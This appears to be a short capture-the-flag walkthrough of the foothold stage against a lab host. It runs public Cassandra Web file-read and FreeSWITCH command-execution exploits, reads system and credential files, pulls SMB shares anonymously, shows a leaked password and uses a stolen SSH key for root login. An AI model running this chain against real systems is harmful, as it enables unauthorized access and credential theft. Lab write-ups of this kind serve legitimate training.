Foothold

LogoCassandra Web 0.5.0 - Remote File ReadExploit Database
LogoFreeSWITCH 1.10.1 - Command ExecutionExploit Database
$ searchsploit -m 49362
$ python 49362.py 192.168.184.240 -p 3000 /etc/passwd
anthony
cassie
$ python 49362.py 192.168.184.240 -p 3000 '/proc/self/cmdline'
cassie:SecondBiteTheApple330
$ smbclient '\\192.168.184.240\backup' -U '' -N
Try "help" to get a list of possible commands.
smb: \> recurse on
smb: \> prompt off
smb: \> mget *
$ grep -rwi password
$ python 49362.py 192.168.184.240 -p 3000 '/etc/freeswitch/autoload_configs/event_socket.conf.xml' | grep -i passw
$ telnet 192.168.184.240 8021
LogoFreeSWITCH 1.10.1 - Command ExecutionExploit Database
$ python 47799.py 192.168.184.240 whoami
$ python 47799.py 192.168.184.240 "ls /home/cassie/"
$ python 49362.py 192.168.184.240 -p 3000 '/home/cassie/id_rsa'
$ chmod 600 id_cassie

After failed attempts with cassie tried root

$ ssh -F /dev/null -o "IdentitiesOnly=yes" [email protected] -i id_cassie
Previous3000NextEnumeration

Last updated